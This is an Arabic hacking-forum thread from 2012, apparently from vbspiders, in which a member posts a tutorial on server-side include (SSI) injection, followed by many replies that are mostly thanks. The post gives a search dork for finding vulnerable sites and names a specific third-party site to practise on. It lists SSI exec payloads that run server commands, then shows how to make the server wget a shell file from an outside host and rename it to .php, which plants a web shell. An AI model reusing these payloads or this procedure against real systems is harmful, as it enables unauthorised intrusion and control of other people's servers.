قنبلة : شرح ثغرات من نوع ssi Injection

Injection · 29 أكتوبر 2012

السلام عليكم ورحمة الله وبركاتة

كيف الحال ؟

الموضوع محتاج فقط كاسه شاي

دورك بسيط : inurl:bin/Cklb/

ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #

اكواد ممكن ان تستعملها

PHP:

<!--#echo var="DATE_LOCAL" -->
Will display the Date

<!--#exec cmd="whoami"--> 
Will show which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux) 
Will display all files in the directory

<!-- #exec cmd="dir" --> (Windows) 
Will display all files in the directory

هذا موقع للتطبيق #

http://dev.stockphotosamerica.com/bin/Cklb

نطبق الكود الثاني في الدخول

PHP:

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

نشوف

تمام الحين تاكدنا انه الثغرة موجودة وكل شيء تمام خلونا نجرب نرفع الشل

نفذ التالي

PHP:

<!--#exec cmd="wget http://website.com/dir/shell.txt" -->

خلونا نشوف اذا الملف اذا انرفع ولالا

عن طريق امر

PHP:

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

تمام انرفع بنجاح بس انرفع بصيغة تكست نفذ الامر التالي لنحولة الى بي اتش بي

PHP:

<!--#exec cmd="mv shell.txt shell.php" -->

ونتاكد الان

استعرض

اتمنة وصلت المعلومة لكم كامل الاحترام والتقدير

اخوكم حمد المهندي

mido868 · 29 أكتوبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

تم التقييم ياغالى

bscbsc · 29 أكتوبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

يعطيك العآفيه اخوي

دام علاء العماد · 29 أكتوبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

موضوع قوي و رائع ، بارك الله فيك يا أخي الكريم و جزاك الله عنا كل خير

Dr.Bat · 29 أكتوبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

وحش ياغالي واصل الي لامام

Cyber Code · 30 أكتوبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

جربت هالثغره من قبل على كم موقع , وفعلا ماقريت من قبل شخصياً موقع عربي شارح عنها شيء,
ملاحضة بسيطه ssi اختصار ل "server side include" وعادتا بالاصح الثغره بنستغلها في حال كان صيغة الصفحة (.shtml) وبنقدر ننفذ اوامر كانها remote code execution مثل ماموضح فوق.

واصل اخ حمد وإلى الأمام .

abdoog · 3 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكوووور عالشرح وبارك الله فيك

sami hack · 4 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكوووور يالغلا ع الشرح وواصل تألقك

hitsKy · 6 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

مشكووووووووووور

Injection · 13 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

منورين حبايب قلبي ..

sH3LL · 14 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

lبارك الله فيك على الشرح

Mr Talal · 16 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

:icon30::موضوع اكثر من رائع

SaMI-php · 20 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

جاري المتايعه

inshtaine · 20 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

اخي موضوع جميل
تم التقييم ياغالى

essalhi saw · 20 نوفمبر 2012

رد: قنبلة : شرح ثغرات من نوع ssi Injection

goooooooooooooooood

Hacker Crazy Top · 26 أبريل 2013

رد: قنبلة : شرح ثغرات من نوع ssi Injection

يا سلام عليك بطل

saadihamdi · 12 نوفمبر 2013

رد: قنبلة : شرح ثغرات من نوع ssi Injection

نشوف و نقولك

L0neLy · 14 أبريل 2014

رد: قنبلة : شرح ثغرات من نوع ssi Injection

تحياتي

vekasouf · 15 يونيو 2014

رد: قنبلة : شرح ثغرات من نوع ssi Injection

good job

mafiaboy31 · 16 يونيو 2014

رد: قنبلة : شرح ثغرات من نوع ssi Injection

nice thank's a lot my bro

السلام عليكم ورحمة الله وبركاتة كيف الحال ؟ الموضوع محتاج فقط كاسه شاي دورك بسيط : inurl:bin/Cklb/ ملاحضة : الموضوع ولفكرة مقتبسة من موقع اجنبي #...

:: Interactive Developer ::

Moderator

New Member

New Member

$ Spam King ~

<img src="http://vbspiders.com/vb/images/rank/prin

New Member

New Member

New Member

:: Interactive Developer ::

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member

New Member